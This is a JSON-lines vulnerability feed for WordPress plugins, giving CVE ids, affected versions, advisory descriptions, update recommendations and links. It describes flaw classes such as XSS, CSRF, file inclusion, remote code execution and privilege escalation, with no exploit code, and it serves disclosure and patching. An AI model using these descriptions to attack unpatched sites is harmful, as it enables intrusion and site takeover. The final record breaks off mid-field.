{"CVE_ID":"CVE-2024-6552","slug":"ameliabooking","versionImpact":"1.2","versionEndExcluding":"1.2.1","description":"The Booking for Appointments and Events Calendar \u2013 Amelia plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.2. This is due to the plugin utilizing Symfony and leaving display_errors on within test files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 1.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9aa2a44-5a71-4a10-9876-3d54b8d268c5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9aa2a44-5a71-4a10-9876-3d54b8d268c5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ameliabooking\\\/trunk\\\/vendor\\\/symfony\\\/http-foundation\\\/Tests\\\/Fixtures\\\/response-functional\\\/cookie_max_age.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ameliabooking\\\/trunk\\\/vendor\\\/symfony\\\/http-foundation\\\/Tests\\\/Fixtures\\\/response-functional\\\/cookie_max_age.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3130903%40ameliabooking&new=3130903%40ameliabooking&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3130903%40ameliabooking&new=3130903%40ameliabooking&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2654","slug":"conditional-menus","versionEndExcluding":"1.2.1","description":"The Conditional Menus WordPress plugin before 1.2.1 does not escape a parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/506ecee9-8e42-46de-9c5c-fc252ab2646e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/506ecee9-8e42-46de-9c5c-fc252ab2646e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1401","slug":"facebook-likebox-widget-and-shortcode","versionImpact":"1.2.0","versionEndExcluding":"1.2.1","description":"The Profile Box Shortcode And Widget WordPress plugin before 1.2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91064ba5-cf65-46e6-88df-0e4d96a3ef9f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91064ba5-cf65-46e6-88df-0e4d96a3ef9f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11904","slug":"mshop-naver-talktalk","versionImpact":"1.2.0","versionEndExcluding":"1.2.1","description":"The ???? ??? plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'msntt_add_plus_talk' shortcode in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202813\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202813\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e501b31-a7f4-4d0d-bf83-af7b6c023a6b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e501b31-a7f4-4d0d-bf83-af7b6c023a6b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11881","slug":"easy-waveform-player","versionImpact":"1.2.0","versionEndExcluding":"1.2.1","description":"The Easy Waveform Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'easywaveformplayer' shortcode in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-waveform-player\\\/trunk\\\/includes\\\/class-easywaveformplayer.php#L263\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-waveform-player\\\/trunk\\\/includes\\\/class-easywaveformplayer.php#L263\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208124\\\/easy-waveform-player\\\/trunk\\\/includes\\\/class-easywaveformplayer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208124\\\/easy-waveform-player\\\/trunk\\\/includes\\\/class-easywaveformplayer.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17a0d8b3-e54d-4af4-8915-e8b192cc138b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17a0d8b3-e54d-4af4-8915-e8b192cc138b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5345","slug":"responsive-owl-carousel-elementor","versionImpact":"1.2.0","versionEndExcluding":"1.2.1","description":"The Responsive Owl Carousel for Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.2.0 via the layout parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included. The inclusion is limited to PHP files.","recommendation":"Update to version 1.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0638c8f3-070a-4b42-ba58-396f3f259b9d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0638c8f3-070a-4b42-ba58-396f3f259b9d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-owl-carousel-elementor\\\/trunk\\\/includes\\\/widgets\\\/owl-carousel.php#L669\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-owl-carousel-elementor\\\/trunk\\\/includes\\\/widgets\\\/owl-carousel.php#L669\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3092511%40responsive-owl-carousel-elementor%2Ftrunk&old=3092226%40responsive-owl-carousel-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3092511%40responsive-owl-carousel-elementor%2Ftrunk&old=3092226%40responsive-owl-carousel-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2169","slug":"currency-switcher","versionImpact":"1.2.0.4","versionEndExcluding":"1.2.0.5","description":"The The WPCS \u2013 WordPress Currency Switcher Professional plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.2.0.4. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 1.2.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/currency-switcher\\\/trunk\\\/index.php#L1920\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/currency-switcher\\\/trunk\\\/index.php#L1920\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3249625%40currency-switcher&new=3249625%40currency-switcher&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3249625%40currency-switcher&new=3249625%40currency-switcher&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3253183%40currency-switcher&new=3253183%40currency-switcher&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3253183%40currency-switcher&new=3253183%40currency-switcher&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbb24ae0-41d6-4d8f-917c-dfd058a7a49d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbb24ae0-41d6-4d8f-917c-dfd058a7a49d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-51506","slug":"currency-switcher","versionImpact":"1.2.0","versionEndExcluding":"1.2.0.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in realmag777 WPCS \u2013 WordPress Currency Switcher Professional allows Stored XSS.This issue affects WPCS \u2013 WordPress Currency Switcher Professional: from n\/a through 1.2.0.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/currency-switcher\\\/wordpress-wpcs-plugin-1-2-0-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/currency-switcher\\\/wordpress-wpcs-plugin-1-2-0-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11388","slug":"dino-game","versionImpact":"1.1.0","versionEndExcluding":"1.2.0","description":"The Dino Game \u2013 Embed Google Chrome Dinosaur Game in WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'dino-game' shortcode in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dino-game\\\/trunk\\\/dino-game.php#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dino-game\\\/trunk\\\/dino-game.php#L41\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1acc5f8-bd77-42e0-96d5-636039a533a1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1acc5f8-bd77-42e0-96d5-636039a533a1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2933","slug":"wp-update-mail-notification","versionImpact":"1.1.6","versionEndExcluding":"1.2.0","description":"The Email Notifications for Updates plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the awun_import_settings() function in all versions up to, and including, 1.1.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"Update to version 1.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3265589%40wp-update-mail-notification&new=3265589%40wp-update-mail-notification\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3265589%40wp-update-mail-notification&new=3265589%40wp-update-mail-notification\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d52e644b-a58f-4e09-9e53-e9cbef75e34f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d52e644b-a58f-4e09-9e53-e9cbef75e34f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2964","slug":"simple-iframe","versionEndExcluding":"1.2.0","description":"The Simple Iframe WordPress plugin before 1.2.0 does not properly validate one of its WordPress block attribute's content, which may allow users whose role is at least that of a contributor to conduct Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97aac334-5323-41bb-90f0-d180bcc9162f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97aac334-5323-41bb-90f0-d180bcc9162f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5843","slug":"ads-by-datafeedrcom","versionImpact":"1.1.3","versionEndExcluding":"1.2.0","description":"The Ads by datafeedr.com plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 1.1.3 via the 'dfads_ajax_load_ads' function. This allows unauthenticated attackers to execute code on the server. The parameters of the callable function are limited, they cannot be specified arbitrarily.","recommendation":"Update to version 1.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ads-by-datafeedrcom\\\/tags\\\/1.1.3\\\/inc\\\/dfads.class.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ads-by-datafeedrcom\\\/tags\\\/1.1.3\\\/inc\\\/dfads.class.php#L34\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5412fd87-49bc-445c-8d16-443e38933d1e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5412fd87-49bc-445c-8d16-443e38933d1e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6541","slug":"allow-svg","versionImpact":"1.1","versionEndExcluding":"1.2.0","description":"The Allow SVG WordPress plugin before 1.2.0 does not sanitize uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.","recommendation":"Update to version 1.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bbe866b8-7497-4e5c-8f59-bb8edac1dc71\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bbe866b8-7497-4e5c-8f59-bb8edac1dc71\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3372","slug":"lana-shortcodes","versionImpact":"1.1.1","versionEndExcluding":"1.2.0","description":"The Lana Shortcodes WordPress plugin before 1.2.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which allows users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 1.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3396b734-9a10-4070-802d-f9d01cc6eb74\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3396b734-9a10-4070-802d-f9d01cc6eb74\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13521","slug":"mailup-auto-subscribtion","versionImpact":"1.1.0","versionEndExcluding":"1.2.0","description":"The MailUp Auto Subscription plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.0. This is due to missing or incorrect nonce validation on the mas_options function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3060078%40mailup-auto-subscribtion%2Ftags%2F1.1.0&new=3229728%40mailup-auto-subscribtion%2Ftags%2F1.2.0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3060078%40mailup-auto-subscribtion%2Ftags%2F1.1.0&new=3229728%40mailup-auto-subscribtion%2Ftags%2F1.2.0\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ee9b2e9-e3fe-43b2-9caf-7246a4201fe9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ee9b2e9-e3fe-43b2-9caf-7246a4201fe9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1689","slug":"tmm_paypal_checkout","versionImpact":"1.1.9","versionEndExcluding":"1.2.0","description":"The ThemeMakers PayPal Express Checkout plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'paypal' shortcode in versions up to, and including, 1.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/ThemeMakers\\\/tmm_paypal_checkout\\\/commit\\\/d6d3b1877ed705ac171cf7e74a6e866fc135ba22\",\"name\":\"https:\\\/\\\/github.com\\\/ThemeMakers\\\/tmm_paypal_checkout\\\/commit\\\/d6d3b1877ed705ac171cf7e74a6e866fc135ba22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/car-dealer-automotive-wordpress-theme-responsive\\\/8574708\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/car-dealer-automotive-wordpress-theme-responsive\\\/8574708\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6390dba6-423b-48be-b5f0-1018d94f4a32?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6390dba6-423b-48be-b5f0-1018d94f4a32?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10124","slug":"vayu-blocks","versionImpact":"1.1.1","versionEndExcluding":"1.2.0","description":"The Vayu Blocks \u2013 Gutenberg Blocks for WordPress & WooCommerce plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation and activation due to a missing capability check on the tp_install() function in all versions up to, and including, 1.1.1. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated. This vulnerability was partially patched in version 1.1.1.","recommendation":"Update to version 1.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/vayu-sites\\\/app.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/vayu-sites\\\/app.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/vayu-sites\\\/app.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/vayu-sites\\\/app.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/vayu-sites\\\/core\\\/class-installation.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vayu-blocks\\\/trunk\\\/inc\\\/vayu-sites\\\/core\\\/class-installation.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173408\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173408\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203532\\\/vayu-blocks\\\/tags\\\/1.2.0\\\/inc\\\/vayu-sites\\\/app.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203532\\\/vayu-blocks\\\/tags\\\/1.2.0\\\/inc\\\/vayu-sites\\\/app.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81e7ab80-7df2-4ef4-80ee-a11d057151c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81e7ab80-7df2-4ef4-80ee-a11d057151c4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9417","slug":"hash-form","versionImpact":"1.1.9","versionEndExcluding":"1.2.0","description":"The Hash Form \u2013 Drag & Drop Form Builder plugin for WordPress is vulnerable to limited file uploads due to a misconfigured file type validation in the 'handleUpload' function in all versions up to, and including, 1.1.9. This makes it possible for unauthenticated attackers to upload files that are excluded from both the 'allowedExtensions' and 'unallowed_extensions' arrays on the affected site's server, including files that may contain cross-site scripting.","recommendation":"Update to version 1.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cad7731a-1f81-4055-9b49-15b35edd3fcf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cad7731a-1f81-4055-9b49-15b35edd3fcf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hash-form\\\/trunk\\\/admin\\\/classes\\\/HashFormUploader.php#L107\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hash-form\\\/trunk\\\/admin\\\/classes\\\/HashFormUploader.php#L107\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hash-form\\\/trunk\\\/admin\\\/classes\\\/HashFormUploader.php#L135\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hash-form\\\/trunk\\\/admin\\\/classes\\\/HashFormUploader.php#L135\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161828\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161828\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11866","slug":"bmlt-tabbed-map","versionImpact":"1.1.8","versionEndExcluding":"1.2.0","description":"The BMLT Tabbed Map plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bmlt_tabbed_map' shortcode in all versions up to, and including, 1.1.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3198537%40bmlt-tabbed-map&new=3198537%40bmlt-tabbed-map&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3198537%40bmlt-tabbed-map&new=3198537%40bmlt-tabbed-map&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49958e9e-7f9b-48fb-bfe2-5b1b437171d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49958e9e-7f9b-48fb-bfe2-5b1b437171d6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1054","slug":"uicore-elements","versionImpact":"1.0.16","versionEndExcluding":"1.2.0","description":"The UiCore Elements \u2013 Free Elementor widgets and templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the UI Counter, UI Icon Box, UI Testimonial Slider, UI Testimonial Grid, and UI Testimonial Carousel widgets in all versions up to, and including, 1.0.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3253371\\\/uicore-elements\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3253371\\\/uicore-elements\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d74e8541-9726-4bc2-9fbd-f6016490e0ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d74e8541-9726-4bc2-9fbd-f6016490e0ea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5537","slug":"delete-usermetas","versionImpact":"1.1.2","versionEndExcluding":"1.2.0","description":"The Delete Usermeta plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing nonce validation on the delumet_options_page() function. This makes it possible for unauthenticated attackers to remove user meta for arbitrary users via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23b46e5b-ce1e-4215-921c-edea7fd6c56a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23b46e5b-ce1e-4215-921c-edea7fd6c56a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/delete-usermetas\\\/trunk\\\/delete-usermetas.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/delete-usermetas\\\/trunk\\\/delete-usermetas.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2979918%40delete-usermetas&new=2979918%40delete-usermetas&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2979918%40delete-usermetas&new=2979918%40delete-usermetas&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12414","slug":"themify-store-locator","versionImpact":"1.1.9","versionEndExcluding":"1.2.0","description":"The Themify Store Locator plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.9. This is due to missing or incorrect nonce validation on the setting_page() function. This makes it possible for unauthenticated attackers to modify the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.2.0, or a newer patched 